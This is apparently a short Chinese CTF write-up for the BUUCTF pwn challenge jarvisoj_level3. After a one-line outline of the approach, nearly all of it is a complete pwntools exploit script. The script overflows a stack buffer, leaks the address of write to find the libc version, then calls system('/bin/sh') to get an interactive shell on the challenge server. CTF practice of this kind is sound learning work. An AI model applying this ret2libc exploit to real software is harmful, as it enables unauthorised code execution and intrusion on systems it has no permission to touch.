[BUUCTF-pwn]——jarvisoj_level3
以前好像写过这个题, 就不详细写了。有兴趣的可以去之前的博客翻一下, 就在BUU和OJ 里面
大致思路, 泄露出一个地址, 找到对应的libc版本。计算偏移找到system和’/bin/sh’
exploit
from pwn import *
from LibcSearcher import *
p = remote("node3.buuoj.cn",27068)
elf = ELF("./level3")
#gdb.attach(p, "b *0x08048482")
write_got = elf.got['write']
write_plt = elf.plt['write']
main = 0x0804844B
payload = 'a' * (0x88 + 0x4) + p32(write_plt) + p32(main) + p32(1) + p32(write_got) + p32(8)
p.sendafter("Input:\n", payload)
write_addr = u32(p.recv(4))
print hex(write_addr)
libc = LibcSearcher("write", write_addr)
libc_base = write_addr - libc.dump("write")
sys_addr = libc_base + libc.dump("system")
binsh = libc_base + libc.dump("str_bin_sh")
payload = 'a' * (0x88 + 0x4) + p32(sys_addr) + p32(0) + p32(binsh)
p.sendlineafter("Input:\n", payload)
p.interactive()